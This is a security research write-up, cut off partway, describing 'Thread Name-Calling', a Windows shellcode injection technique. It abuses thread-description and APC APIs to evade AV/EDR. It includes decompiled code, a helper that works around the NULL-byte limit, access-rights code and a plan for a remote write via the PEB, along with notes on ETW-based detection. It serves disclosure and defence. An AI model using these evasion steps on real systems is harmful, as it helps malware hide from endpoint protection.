Thread Name-Calling – using Thread Name for offense

July 25, 2024

Research by: hasherezade

Highlights:

  • Process Injection is one of the important techniques in the attackers’ toolkit.
  • In the following write-up, Check Point Research (CPR) explains how the API for thread descriptions can be abused to bypass endpoint protection products.
  • We propose a new injection technique, Thread Name-Calling, and offer advice on implementing protection against it.

Introduction

Process injection is one of the important techniques used by attackers. Its variants can be found in almost every piece of malware. It serves purposes such as:

  • defense evasion: hiding malicious modules under the cover of a different process
  • interference in the existing process: reading its memory, hooking the used API, etc.
  • privilege escalation

Because interference in a process’s memory by malicious modules can cause a lot of damage, all sorts of AV and EDR products monitor such behaviors and try to prevent them. However, this monitoring relies on knowledge of the common APIs used to implement injection methods. This cat-and-mouse game never ends. Cybercriminals, as well as red teamers, keep trying to break the known patterns by using atypical APIs, and thereby evade the detection implemented at the time. Examples include the Atom Bombing technique (from 2016), which uses the Atom Table to pass code into the remote process, and the recently introduced Pool Party (from 2023), in which thread pools are abused to run code in the context of a different process without EDRs noticing it. The diversity of the APIs used has been very well described in the paper “Windows Process Injection in 2019” by Amit Klein and Itzik Kotler.

Thread Name-Calling is yet another take on this topic. It is a technique that allows implanting shellcode into a running process, using the following Windows APIs:

  • GetThreadDescription / SetThreadDescription (introduced in Windows 10, 1607) – an API for setting and retrieving the thread description (a.k.a. thread name)
  • ZwQueueApcThreadEx2 (introduced in Windows 10, 19045) – a new API for Asynchronous Procedure Calls (APC)

Remote memory allocation and writing are achieved using a process handle opened without write access (PROCESS_VM_WRITE). Thanks to this feature, and because the APIs we used are not commonly associated with process injection, we were able to bypass some of the major AV and EDR products. In this blog we elaborate on the implementation details of this new technique and suggest some possible detection methods.

Thread Name in offensive use-cases

Before we begin, note that the functions involved are relatively new and are not used in any well-established injection methods. However, they are not “brand new”: they were added a few years ago, so naturally we are not the first to research their potential in offensive scenarios. Some of the related uses were discussed on X/Twitter (we found a question by Adam “Hexacorn” from 2020, and one by Gal Yaniv from 2021, referencing those APIs). We tried to collect the various use-cases to the best of our abilities, and list the related PoCs.

Get/SetThreadDescription may be utilized in:

  • undocumented IPC: a thread name is used as a “mailbox” via which two processes exchange messages. The sender process can pass information to a receiver process by setting a description on one of its threads. The receiver reads the description from the thread and processes it further.
  • hiding an inactive code implant from a memory scan. This idea is similar to ShellcodeFluctuation, but instead of (or in addition to) encryption, we temporarily store the code as a thread name (which is a kernel mode structure), out of the working set, that is, out of sight of user mode memory scanners. It is repeatedly retrieved into the working set, executed for a small time slot, then stored again as the thread name.
  • allocating memory in kernel mode from user mode so that it can be further used in scenarios related to kernel mode exploitation
  • remote code injection
    • “DoubleBarrel” – by Sam Russel, 2022 : https://www.lodsb.com/shellcode-injection-using-threadnameinformation : injects code using a variant of thread hijacking, redirecting thread execution to a ROP chain built from content passed via the thread name. This technique does not create additional executable memory space, which gives it the potential to evade some detections. The downsides are the limitations imposed on the shellcode (it must be a handcrafted ROP chain, containing gadgets specific to the particular version of Windows), and the possible instability of the target application after the shellcode execution. Also, use of the API for direct thread manipulation is prone to trigger alerts.
    • “Thread Name-Calling injection” – the technique introduced in this article. The code to be injected is passed as a thread description to the target. Next, the function GetThreadDescription is called remotely on the target, via APC, causing the description buffer to be copied into the target’s working set. After making the buffer executable, it is run using another APC call. It supports any custom shellcode. This technique does not corrupt the original thread: the target application seamlessly continues its execution.
  • DLL injection variant: typically for this technique, we write a path to our DLL into the address space of the target, and then remotely call LoadLibrary to get the DLL loaded within the target. In contrast to the classic implementation that uses VirtualAllocEx and WriteProcessMemory, here the path of the DLL is passed via thread name (remote write achieved as in the Thread Name-Calling).
    • This technique is described in the “Bonus” section of this article.

The APIs Used

Let’s start by looking at the APIs that are vital for the introduced technique. Understanding the details of their implementation is crucial for explaining how they are abused later.

GetThreadDescription / SetThreadDescription

Starting with Windows 10, version 1607, the following functions are available in the Windows API:

GetThreadDescription

HRESULT GetThreadDescription(
 [in] HANDLE hThread,
 [out] PWSTR *ppszThreadDescription 
);

SetThreadDescription

HRESULT SetThreadDescription(
 [in] HANDLE hThread,
 [in] PCWSTR lpThreadDescription 
);

Their intended use is to set and retrieve the description (name) of a thread. A name helps identify what the thread does and can help, e.g., in debugging. However, if we look at this API with an offensive mindset, we can quickly see some potential for misuse.

To set the name, we need to open a handle to the thread with the access flag THREAD_SET_LIMITED_INFORMATION. Under this minimal requirement, we can attach our arbitrary buffer to any thread of a remote process.

The buffer must be a Unicode string, which basically means any buffer terminated by L'\0' (a double NULL byte). The size that we can allocate is pretty generous: 0x10000 bytes, of which, according to experiments, we can use (0x10000 - 2) for our data buffer (including the terminator). This is equivalent to almost 16 pages of data, which is more than enough to store a block of shellcode…
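
The arithmetic behind these figures can be checked with a small, portable sketch. The constants restate the experimental limits quoted above, and the 4 KiB page size is an assumption about the target platform; the helper names are illustrative and not part of any Windows API.

```cpp
#include <cassert>
#include <cstddef>

// Experimental limits quoted in the text (not documented guarantees).
constexpr std::size_t kMaxAllocation = 0x10000;            // bytes
constexpr std::size_t kUsableBytes   = kMaxAllocation - 2; // terminator included
constexpr std::size_t kPageSize      = 0x1000;             // assumption: 4 KiB pages

// Payload bytes left once one 2-byte WCHAR is reserved for the terminating L'\0'.
constexpr std::size_t payload_bytes() { return kUsableBytes - 2; }

// Number of pages needed to hold n bytes, rounded up.
constexpr std::size_t pages_for(std::size_t n) { return (n + kPageSize - 1) / kPageSize; }

// Runtime self-check of the figures above.
inline void check_capacity_figures() {
    assert(kUsableBytes == 0xFFFE);
    assert(payload_bytes() == 0xFFFC);
    assert(pages_for(kUsableBytes) == 16); // "almost 16 pages": the last page is 2 bytes short
}
```

The upper bound is consistent with UNICODE_STRING storing its lengths in 16-bit fields, so an even byte count cannot exceed 0xFFFE.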

API Implementation

The described functions are implemented in Kernelbase.dll.

  1. SetThreadDescription:
#define ThreadNameInformation 0x26

HRESULT __stdcall SetThreadDescription(HANDLE hThread, PCWSTR lpThreadDescription)
{
  NTSTATUS status; // eax
  struct _UNICODE_STRING DestinationString;

  status = RtlInitUnicodeStringEx(&DestinationString, lpThreadDescription);
  if ( status >= 0 )
    status = NtSetInformationThread(hThread, ThreadNameInformation, &DestinationString, 0x10u);
  return status | 0x10000000;
}

This function expects a Unicode string buffer (WCHAR*), from which it creates a UNICODE_STRING structure that is passed further. Looking at the implementation, we can see that attaching the string to the thread is done by NtSetInformationThread. The returned value is the result of this low-level API, converted from NTSTATUS to HRESULT by setting FACILITY_NT_BIT (0x10000000).
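
To make the status conversion concrete, here is a minimal portable sketch of the same bit operation. The type aliases are stand-ins for the Windows typedefs (an assumption made so the code compiles without Windows headers), and the function names are illustrative.

```cpp
#include <cassert>
#include <cstdint>

// Stand-ins for the Windows typedefs so the sketch compiles anywhere (assumption).
using NtStatus = std::int32_t;
using HResult  = std::int32_t;

constexpr std::uint32_t kFacilityNtBit = 0x10000000;

// Same operation as the `status | 0x10000000` in the decompiled code.
inline HResult hresult_from_nt(NtStatus status) {
    return static_cast<HResult>(static_cast<std::uint32_t>(status) | kFacilityNtBit);
}

// Mirrors the usual SUCCEEDED() test: a non-negative value means success.
inline bool succeeded(HResult hr) { return hr >= 0; }

inline void check_conversion() {
    assert(succeeded(hresult_from_nt(0)));                         // STATUS_SUCCESS
    const NtStatus no_memory = static_cast<NtStatus>(0xC0000017u); // STATUS_NO_MEMORY
    assert(!succeeded(hresult_from_nt(no_memory)));
    assert(static_cast<std::uint32_t>(hresult_from_nt(no_memory)) == 0xD0000017u);
}
```

Because only one extra bit is set and the sign bit is untouched, a failing NTSTATUS remains a failing HRESULT, so callers can keep using the ordinary success check.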

In our implementation of a remote write, we start by calling SetThreadDescription on a remote thread, making it hold our buffer.

  2. GetThreadDescription:
HRESULT __stdcall GetThreadDescription(HANDLE hThread, PWSTR *ppszThreadDescription)
{
  SIZE_T struct_len; // rbx
  SIZE_T struct_size; // r8
  NTSTATUS res; // eax
  NTSTATUS status; // ebx
  const UNICODE_STRING *struct_buf; // rdi
  ULONG ReturnLength; // [rsp+58h] [rbp+10h] BYREF

  *ppszThreadDescription = nullptr;
  LODWORD(struct_len) = 144;
  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0);
  for ( struct_size = 146; ; struct_size = struct_len + 2 )
  {
    struct_buf = (const UNICODE_STRING *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, struct_size);
    if ( !struct_buf )
    {
      status = 0xC0000017;
      goto finish;
    }
    res = NtQueryInformationThread(
            hThread,
            ThreadNameInformation,
            (PVOID)struct_buf,
            struct_len,
            &ReturnLength);
    status = res;
    if ( res != 0xC0000004 && res != 0xC0000023 && res != 0x80000005 )
      break;
    struct_len = ReturnLength;
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf);
  }
  if ( res >= 0 )
  {
    ReturnLength = struct_buf->Length;
    // move the buffer to the beginning of the structure
    memmove_0((void *)struct_buf, struct_buf->Buffer, ReturnLength);
    // null terminate the buffer
    *(&struct_buf->Length + ((unsigned __int64)ReturnLength >> 1)) = 0;
    // fill in the passed pointer
    *ppszThreadDescription = &struct_buf->Length;
    struct_buf = 0i64;
  }
finish:
  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf);
  return status | 0x10000000;
}

Analyzing this function reveals some other interesting implementation details. The buffer for the thread name that we want to retrieve is allocated on the heap of the retrieving process. The function automatically allocates a size that can fit the relevant UNICODE_STRING. It then overwrites the initial fields of the structure (Length and MaximumLength) by moving the buffer content to the beginning of the structure, transforming it into a simple, null-terminated wide string. Next, the pointer to this new buffer is stored in the variable passed by the caller.
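
The in-place transformation can be imitated in portable C++. The sketch below is a simplified model, not the Kernelbase.dll code: FakeUnicodeString is a hypothetical stand-in for the 64-bit UNICODE_STRING layout, and both helper functions are invented for illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

// Hypothetical stand-in for the 64-bit UNICODE_STRING layout.
struct FakeUnicodeString {
    std::uint16_t Length;        // payload size in bytes, terminator not counted
    std::uint16_t MaximumLength; // capacity in bytes
    char16_t*     Buffer;        // points at the characters
};

// Mimics the query result: the structure, immediately followed by the characters.
inline std::vector<unsigned char> make_query_result(const std::u16string& name) {
    const std::size_t bytes = name.size() * sizeof(char16_t);
    std::vector<unsigned char> block(sizeof(FakeUnicodeString) + bytes);
    FakeUnicodeString hdr{};
    hdr.Length = static_cast<std::uint16_t>(bytes);
    hdr.MaximumLength = hdr.Length;
    hdr.Buffer = reinterpret_cast<char16_t*>(block.data() + sizeof(FakeUnicodeString));
    std::memcpy(block.data(), &hdr, sizeof hdr);
    std::memcpy(block.data() + sizeof hdr, name.data(), bytes);
    return block;
}

// Same steps as the tail of the decompiled function: move, terminate, reuse the block.
inline std::u16string to_plain_wide_string(std::vector<unsigned char>& block) {
    FakeUnicodeString hdr;
    std::memcpy(&hdr, block.data(), sizeof hdr);
    const std::size_t len = hdr.Length;
    std::memmove(block.data(), hdr.Buffer, len);       // text overwrites the header
    const char16_t nul = u'\0';
    std::memcpy(block.data() + len, &nul, sizeof nul); // null-terminate
    std::u16string out(len / sizeof(char16_t), u'\0');
    std::memcpy(&out[0], block.data(), len);
    return out;
}

inline void check_round_trip() {
    std::vector<unsigned char> block = make_query_result(u"worker");
    assert(to_plain_wide_string(block) == u"worker");
}
```

Note that the copy is driven by the stored Length rather than by scanning for a terminator, so a name containing zero characters in the middle survives the move intact.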

If we call GetThreadDescription remotely, in the context of the target process, we get a buffer allocated on the target’s heap and filled with our content.

Location of the structure

Looking at the implementation, we can see that the buffer we retrieve via GetThreadDescription is just a local copy. Now the question is: where is the original UNICODE_STRING, associated with the thread, stored? To learn more, we need to look into the Windows kernel (ntoskrnl.exe), at the implementation of the syscalls that set and read it (NtSetInformationThread and NtQueryInformationThread).

It turns out this buffer is stored in kernel mode, referenced by the ThreadName field of ETHREAD.

   lkd> dt nt!_ETHREAD
   [...]
   +0x610 ThreadName       : Ptr64 _UNICODE_STRING
   [...]

Fragment of NtSetInformationThread responsible for setting the thread name (in Kernel Mode):

[...]
          Length = Src.Length;
          if ( (Src.Length & 1) != 0 || Src.Length > Src.MaximumLength )
          {
            status = 0xC000000D; // STATUS_INVALID_PARAMETER -> invalid buffer size supplied
          }
          else
          {
            PoolWithTag = ExAllocatePoolWithTag(NonPagedPoolNx, Src.Length + 16i64, 'mNhT'); // allocating a buffer on non paged pool, with tag 'ThNm'
            threadName = PoolWithTag;
            v113 = PoolWithTag;
            if ( PoolWithTag )
            {
              p_Length = &PoolWithTag[1].Length;
              threadName->Buffer = p_Length;
              threadName->Length = Length;
              threadName->MaximumLength = Length;
              memmove(p_Length, Src.Buffer, Length);
              eThread = Object;
              PspLockThreadSecurityExclusive(Object, CurrentThread);
              v105 = 1;
              P = eThread->ThreadName;
              eThread->ThreadName = threadName;
              threadName = 0i64;
              v113 = 0i64;
              EtwTraceThreadSetName(eThread);
              goto finish;
            }
            status = 0xC000009A;
          }
        }
        else
        {
          status = 0xC0000004;
        }
        v104 = status;
finish:
[...]

As we can see, the buffer is allocated on NonPagedPoolNx (non-executable non-paged pool). The allocated buffer is filled with the UNICODE_STRING, and its pointer is stored in ThreadName within the ETHREAD structure of a particular thread.
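
The length checks and the allocation size visible in the fragment can be restated as a short portable sketch. It only mirrors the arithmetic of the decompiled code as we read it; the function names are illustrative, and the 16-byte header size is taken from the "+ 16" in the allocation call.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

constexpr std::uint32_t kStatusSuccess          = 0x00000000;
constexpr std::uint32_t kStatusInvalidParameter = 0xC000000D;
constexpr std::size_t   kHeaderSize             = 16; // the "+ 16" in the allocation call

// The name is rejected when its byte length is odd or exceeds the declared capacity.
inline std::uint32_t check_name_lengths(std::uint16_t length, std::uint16_t maximum_length) {
    const bool odd = (length & 1) != 0;
    return (odd || length > maximum_length) ? kStatusInvalidParameter : kStatusSuccess;
}

// One pool block holds the header followed directly by the characters.
inline std::size_t pool_allocation_size(std::uint16_t length) { return kHeaderSize + length; }

inline void check_layout() {
    assert(check_name_lengths(8, 8) == kStatusSuccess);
    assert(check_name_lengths(7, 8) == kStatusInvalidParameter);  // odd length
    assert(check_name_lengths(10, 8) == kStatusInvalidParameter); // longer than capacity
    assert(pool_allocation_size(8) == 24);
}
```

Nothing in these checks inspects the content of the buffer, only its declared lengths.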

The event of setting the ThreadName is registered by ETW (Event Tracing for Windows), which can be further used to detect this injection method. The generated event records the ProcessID and ThreadID, which identify the thread, along with the ThreadName that was set.

__int64 __fastcall EtwTraceThreadSetName(_ETHREAD *thread)
{
  int v1; // r10d
  _UNICODE_STRING *ThreadName; // rax
  __int64 *Buffer; // rcx
  unsigned int Length; // edx
  unsigned __int64 len; // rax
  int v7[4]; // [rsp+30h] [rbp-50h] BYREF
  __int64 v8[2]; // [rsp+40h] [rbp-40h] BYREF
  __int64 *buf; // [rsp+50h] [rbp-30h]
  __int64 v10; // [rsp+58h] [rbp-28h]
  __int64 *v11; // [rsp+60h] [rbp-20h]
  __int64 v12; // [rsp+68h] [rbp-18h]

  v7[0] = thread->Cid.UniqueProcess;
  v1 = 2;
  v7[1] = thread->Cid.UniqueThread;
  v8[0] = v7;
  ThreadName = thread->ThreadName;
  v7[2] = 0;
  v8[1] = 8i64;
  if ( ThreadName && (Buffer = ThreadName->Buffer) != 0i64 )
  {
    Length = ThreadName->Length;
    len = 0x800i64;
    if ( Length < 0x800u )
      len = Length;
    buf = Buffer;
    v10 = len;
    if ( !len || *(Buffer + (len >> 1) - 1) )
    {
      v12 = 2i64;
      v11 = &EtwpNull;
      v1 = 3;
    }
  }
  else
  {
    v10 = 2i64;
    buf = &EtwpNull;
  }
  return EtwTraceKernelEvent(v8, v1, 2, 1352, 0x501802);
}
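
For anyone building detection on this event, it helps to know how much of the name is actually logged. The sketch below models our reading of the decompiled routine: at most 0x800 bytes of the name are included, and a terminator is appended when the logged part is empty or does not already end in a zero WCHAR. The function name is illustrative, and the model is an interpretation rather than a documented contract.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <string>

constexpr std::size_t kMaxLoggedBytes = 0x800; // cap seen in the decompiled routine

// Returns the name as it would appear in the event payload, terminator included.
inline std::u16string etw_logged_name(const std::u16string& name) {
    const std::size_t bytes = std::min(name.size() * sizeof(char16_t), kMaxLoggedBytes);
    std::u16string logged = name.substr(0, bytes / sizeof(char16_t));
    // An empty name, or one whose logged part lacks a trailing zero WCHAR, gets a terminator.
    if (logged.empty() || logged.back() != u'\0') logged.push_back(u'\0');
    return logged;
}

inline void check_logged_name() {
    assert(etw_logged_name(u"abc").size() == 4);                        // 3 characters + terminator
    assert(etw_logged_name(std::u16string(0x500, u'A')).size() == 0x401); // truncated to 0x400 characters
}
```

Under this reading, a thread name much longer than 0x800 bytes is only partially visible in the event, so a rule that inspects the logged content sees just the beginning of the buffer.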

Removing the NULL byte limitations

Setting the thread name through the official API imposes some limitations on the buffer. It has to be a valid Unicode string, which means that an empty WCHAR is used as the buffer terminator. The size of WCHAR is two bytes, so if our shellcode contains a double NULL byte, only the part before it is copied. This is a common limitation encountered whenever shellcode is passed via a buffer dedicated to holding strings. To solve this issue, shellcode encoders have been invented: they convert a buffer into a format that is free of NULL bytes. We can use one of them in our case as well.
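
The truncation effect is easy to reproduce without any Windows API. The sketch below measures a byte buffer the way a wide-string routine would, scanning 16-bit units until the first zero unit; the function name and the sample bytes are arbitrary illustrations.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Byte length a wide-string routine would see: scan 2-byte units until a zero unit.
inline std::size_t wide_string_bytes(const std::vector<unsigned char>& buf) {
    std::size_t i = 0;
    while (i + 1 < buf.size() && !(buf[i] == 0 && buf[i + 1] == 0)) i += 2;
    return i;
}

inline void check_truncation() {
    // Units: (11 00) (00 22) (00 00) (33 44). The third unit is the terminator.
    const std::vector<unsigned char> data = {0x11, 0x00, 0x00, 0x22, 0x00, 0x00, 0x33, 0x44};
    assert(wide_string_bytes(data) == 4); // the last two bytes are never copied
}
```

In this model only a zero pair aligned to a 2-byte boundary terminates the string: the two zero bytes at offsets 1 and 2 in the sample straddle two units and are ignored.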

However, by analyzing the implementation of the above API, we realized that it is possible to avoid this limitation at its root. When the thread name is copied between buffers, the declared length from the UNICODE_STRING structure is used, along with the memmove function, which does not treat NULL bytes as terminators. The only function that imposes the NULL byte constraint is SetThreadDescription. Underneath, it calls RtlInitUnicodeStringEx, which takes the passed WCHAR buffer and uses it to initialize the UNICODE_STRING structure. The input buffer must be NULL-terminated, and the length saved in the structure is determined by the position of this terminator.

We can create an easy workaround for our problem, by using a custom implementation of SetThreadDescription:

HRESULT mySetThreadDescription(HANDLE hThread, const BYTE* buf, size_t buf_size)
{
    UNICODE_STRING DestinationString = { 0 };
    BYTE* padding = (BYTE*)::calloc(buf_size + sizeof(WCHAR), 1);
    ::memset(padding, 'A', buf_size);

    auto pRtlInitUnicodeStringEx = reinterpret_cast<decltype(&RtlInitUnicodeStringEx)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeStringEx"));
    pRtlInitUnicodeStringEx(&DestinationString, (PCWSTR)padding);
    // fill with our real content:
    ::memcpy(DestinationString.Buffer, buf, buf_size);

    auto pNtSetInformationThread = reinterpret_cast<decltype(&NtSetInformationThread)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationThread"));
    NTSTATUS status = pNtSetInformationThread(hThread, (THREADINFOCLASS)(ThreadNameInformation), &DestinationString, 0x10u);
    ::free(padding);
    return HRESULT_FROM_NT(status);
}

This function initializes UNICODE_STRING based on a dummy buffer of the required length, and then fills it with the actual content (which may contain NULL bytes). The prepared structure is then passed to the thread using the low-level API NtSetInformationThread.

NtQueueApcThreadEx2

In the implementation of our injection technique, we rely on calling some APIs remotely within the target process.

Windows supports adding routines to the Asynchronous Procedure Call (APC) queue of existing threads, making it possible to run code in a remote process without creating an additional thread. At a low level, this functionality is exposed by the function NtQueueApcThreadEx (and its wrapper, NtQueueApcThread). The official, higher-level API recommended by Microsoft is QueueUserAPC, which works as a wrapper for the lower-level function. We are free to add an APC to a remote thread, as long as its handle is opened with THREAD_SET_CONTEXT access.

The related APIs have often been misused in a variety of (old and new) injection techniques, and are described in the MITRE database. APC allows running remote code by hopping onboard an existing thread, which is stealthier than the common alternative of creating a remote thread. Creating a new thread triggers a kernel callback (PsSetCreateThreadNotifyRoutineEx), often used by kernel-mode components of AV / EDR products for detection.

In addition, APC gives us more freedom in passing parameters to the remote function. When creating a new thread, we can pass only one argument, whereas here we can use three.

However, using the plain NtQueueApcThread has a drawback. To add our function to the APC queue, we first need to find a thread that is in an alertable state (waiting for a signal). Our callback is executed only when the thread is alerted. How to approach this obstacle is explained, e.g., in the blog post by modexp. Relying on alertable threads limits our choice of targets, and scanning for them adds complexity to the injector.

Fortunately, a workaround for this problem appeared when new types of APC callbacks were introduced on Windows. They are defined by QUEUE_USER_APC_FLAGS. Since the introduction of this type, the argument ReserveHandle in NtQueueApcThreadEx was replaced with UserApcOption, where we can pass such a flag, modifying the function’s behavior. The most interesting from our perspective is the Special User APC (QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC), which allows us to inject into threads that are not necessarily in an alertable state:

Quote from MSDN:

Special user-mode APCs always execute, even if the target thread is not in an alertable state. For example, if the target thread is currently executing user-mode code, or if the target thread is currently performing an alertable wait, the target thread will be interrupted immediately for APC execution. If the target thread is executing a system call, or performing a non-alertable wait, the APC will be executed after the system call or non-alertable wait finishes (the wait is not interrupted).

Note that the potential of the new API for improving injection methods was already noticed by researchers, and is described, e.g., in this blog by repnz.

This new APC type has also been criticized for the associated risk of introducing stability issues in the application and making it harder to synchronize the threads (e.g. here). However, it should not be a big problem in our case, as we are using it to run code that is completely independent from the running application and does not use any resources that could create concurrency issues.

The new API supporting the added APC types was officially added in Windows 11 (Build 22000). It is exposed by the function: QueueUserAPC2, which, at the lower level, was implemented by a new version of the well-known NtQueueApcThreadEx. The new function is simply called NtQueueApcThreadEx2 and has the following prototype (source):

NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueueApcThreadEx2(
    _In_ HANDLE ThreadHandle,
    _In_opt_ HANDLE ReserveHandle, // NtAllocateReserveObject
    _In_ ULONG ApcFlags, // QUEUE_USER_APC_FLAGS
    _In_ PPS_APC_ROUTINE ApcRoutine,
    _In_opt_ PVOID ApcArgument1,
    _In_opt_ PVOID ApcArgument2,
    _In_opt_ PVOID ApcArgument3
    );

It turns out, we can find this API on Windows 10, since build 19045 – which is earlier than the officially supported version.

As this is a relatively new API, associated with a new syscall, using it can also give an opportunity to bypass some of the products that are not yet watching it.

We use this API for a remote function execution in our implementation of Thread Name-Calling. Still, it is possible to implement a (less stealthy) variant of Thread Name-Calling, using the old API, which we will also demonstrate.

RtlDispatchAPC

This function is not a requirement for our technique, but rather a helper that makes the shellcode execution a bit more stealthy.

Once the shellcode is successfully copied into the remote process, we need to run it. We decided to do it by adding its start address to the APC queue of the remote thread. However, since our shellcode is in private memory rather than in any mapped module, passing its address directly may trigger some alerts. To evade this indicator, it is beneficial to use some legitimate function as a proxy. There are multiple functions that accept a callback to be executed. Many of them have been documented extensively by Hexacorn in his blog. Some interesting additions have been noted on the modexp blog.

The function RtlDispatchAPC looks like a perfect candidate. It has three arguments, so it is compatible with the APC API. The implementation:

void __fastcall RtlDispatchAPC(void (__fastcall *callback)(__int64), __int64 callback_arg, void *a3)
{
  __int64 v6 = 72LL;
  int v7 = 1;
  __int128 v8 = 0LL;
  __int128 v9 = 0LL;
  __int128 v10 = 0LL;
  __int64 v11 = 0LL;

  if ( a3 == (void *)-1LL )
  {
    callback(callback_arg);
  }
  else
  {
    RtlActivateActivationContextUnsafeFast(&v6, a3);
    callback(callback_arg);
    RtlDeactivateActivationContextUnsafeFast(&v6);
    RtlReleaseActivationContext(a3);
  }
}

To make the above function execute our shellcode we need to pass it the following parameters:

RtlDispatchAPC(shellcodePtr, 0, (void *)(-1))

Note that RtlDispatchAPC is not exported by name, but, on the tested versions of Windows, we could find it easily by Ordinal 8.

Figure 1 – RtlDispatchAPC among symbols of NTDLL.DLL

Introducing Thread Name-Calling injection

Now that we have introduced all the important APIs, let’s dive into the implementation details of Thread Name-Calling. As already mentioned, it is a variant of a technique that allows us to inject a shellcode into a running process (in contrast to the techniques that operate on the process that needs to be freshly created).

Minimal access rights

Typically, when we want to write a buffer into a process, we need to first open a handle to this process with a write access right (PROCESS_VM_WRITE) – which may be treated as a suspicious indicator. Thread Name-Calling allows us to achieve the write, and remote allocation, without it.

The currently presented implementation requires opening the process handle with the following access rights:

HANDLE open_process(DWORD processId, bool isCreateThread)
{
    DWORD access = PROCESS_QUERY_LIMITED_INFORMATION // required for reading the PEB address
        | PROCESS_VM_READ // required for reading back the pointer to the created buffer
        | PROCESS_VM_OPERATION // to set memory area executable or/and allocate a new executable memory
        ;
    if (isCreateThread) {
        access |= PROCESS_CREATE_THREAD; // to create a new thread where we can pass APC
    }
    return OpenProcess(access, FALSE, processId);
}
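For readers reviewing handle-open telemetry, it can help to see the requested mask spelled out as individual rights. The sketch below is a portable illustration, not part of the original PoC: the helper names `describe_process_access` and `requests_write` are hypothetical, and the numeric constants repeat the values from the Windows SDK headers so the code builds without them.

```cpp
#include <cstdint>
#include <string>
#include <vector>

// Process access rights, with the values used by the Windows SDK headers.
// They are repeated here so the sketch compiles on any platform.
constexpr std::uint32_t kProcessCreateThread            = 0x0002;
constexpr std::uint32_t kProcessVmOperation             = 0x0008;
constexpr std::uint32_t kProcessVmRead                  = 0x0010;
constexpr std::uint32_t kProcessVmWrite                 = 0x0020;
constexpr std::uint32_t kProcessDupHandle               = 0x0040;
constexpr std::uint32_t kProcessQueryLimitedInformation = 0x1000;

// Hypothetical helper: lists the known rights present in an access mask.
inline std::vector<std::string> describe_process_access(std::uint32_t mask)
{
    struct Entry { std::uint32_t bit; const char* name; };
    static const Entry kKnown[] = {
        { kProcessCreateThread,            "PROCESS_CREATE_THREAD" },
        { kProcessVmOperation,             "PROCESS_VM_OPERATION" },
        { kProcessVmRead,                  "PROCESS_VM_READ" },
        { kProcessVmWrite,                 "PROCESS_VM_WRITE" },
        { kProcessDupHandle,               "PROCESS_DUP_HANDLE" },
        { kProcessQueryLimitedInformation, "PROCESS_QUERY_LIMITED_INFORMATION" },
    };
    std::vector<std::string> names;
    for (const Entry& e : kKnown) {
        if (mask & e.bit) names.push_back(e.name);
    }
    return names;
}

// Hypothetical helper: true if the mask asks for the classic write right.
inline bool requests_write(std::uint32_t mask)
{
    return (mask & kProcessVmWrite) != 0;
}
```

Applied to the mask built by open_process above, the decoder reports three rights (four when isCreateThread is set) and requests_write returns false. A rule keyed only on PROCESS_VM_WRITE would therefore not match this handle request.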

Depending on our needs, Thread Name-Calling can be implemented in different flavors. In the most stealthy (recommended) variant, we do the remote calls using routines added to the APC queue of an existing thread. However, if we want to run it on older versions of Windows, where the new API for APC is not available, and we can’t find alertable threads in our desired target, we may create an additional thread. In such a case, the relevant access right needs to be set on our process handle:

  • PROCESS_CREATE_THREAD

Keep in mind that this change increases the detection ratio of the technique. However, we found some products where it was enough for the bypass.

Generally, it is a good practice to minimize the used access rights. Of the ones listed above, we can still avoid using some of them by further refining the implementation. For example:

  • PROCESS_QUERY_LIMITED_INFORMATION – can be avoided if we don’t use PEB for the pointer storage (details explained later)

During the injection, we operate on threads of our target process. Regarding the thread handle, these are the minimal required access rights:

    DWORD thAccess = SYNCHRONIZE;
    thAccess |= THREAD_SET_CONTEXT; // required for adding to the APC queue
    thAccess |= THREAD_SET_LIMITED_INFORMATION; // required for setting thread description

Implementation

As is always the case with remote shellcode injection, the implementation must cover:

  • writing our buffer into the remote process’ working set
  • making it executable
  • running the implanted code

Remote write with the help of thread description

Let’s have a look at the details of how the remote allocation, along with remote writing, can be implemented with the help of the APIs mentioned earlier.

  • As we are implementing code injection, we must start by preparing a proper shellcode. Since we got rid of the NULL byte constraint, we only need to ensure that our shellcode will not be blocking the thread it runs on, and that it has a clean exit.
  • From our injector application, we need to select a thread within the target, where we can set a thread description containing our shellcode. If we use the new API with Special User APC, we can pick just any thread, but if we use the old API – we must ensure that the selected thread is alertable.
  • Next, the thread description must be retrieved within the context of the remote process, so that the buffer will be read into the process’ working set. This can be achieved by a remote call of the function:
HRESULT GetThreadDescription(
  [in]  HANDLE hThread,
  [out] PWSTR  *ppszThreadDescription // <- we get back the pointer to allocated buffer
);

Remember that the above function automatically allocates a buffer of a required size on the heap, and then fills it in with the thread description. This gives us the remote write primitive together with remote allocation of a buffer with Read/Write access. The pointer to this new buffer will be filled into the supplied variable ppszThreadDescription.

Therefore, we need to prepare in advance a memory address within the remote process that can be used as *ppszThreadDescription. It must be an area of a pointer size where the called function GetThreadDescription can write back. There are various options to approach it:

  1. find some tiny cave in a writable memory of the remote process
  2. utilize some unused fields in a PEB of the remote process

We decided to utilize an unused field in a PEB because it is very easy to find and retrieve, but we can later replace it with a cave if needed.

By checking fields in the PEB we can find the following:

    [...]
    PVOID SparePointers[2]; // 19H1 (previously FlsCallback to FlsHighIndex)
    PVOID PatchLoaderData;
    PVOID ChpeV2ProcessInfo; // _CHPEV2_PROCESS_INFO

    ULONG AppModelFeatureState;
    ULONG SpareUlongs[2]; // ---> unused field, can be utilized to store our pointer

    USHORT ActiveCodePage;
    USHORT OemCodePage;
    USHORT UseCaseMapping;
    USHORT UnusedNlsField;

    PVOID WerRegistrationData;
    PVOID WerShipAssertPtr;

    union
    {
        PVOID pContextData; // WIN7
        PVOID pUnused; // WIN10
        PVOID EcCodeBitMap; // WIN11
    };
    [...]

The field SpareUlongs looks like a good candidate. We can retrieve its exact offset by dumping the PEB with WinDbg:

lkd> dt nt!_PEB
   [...]
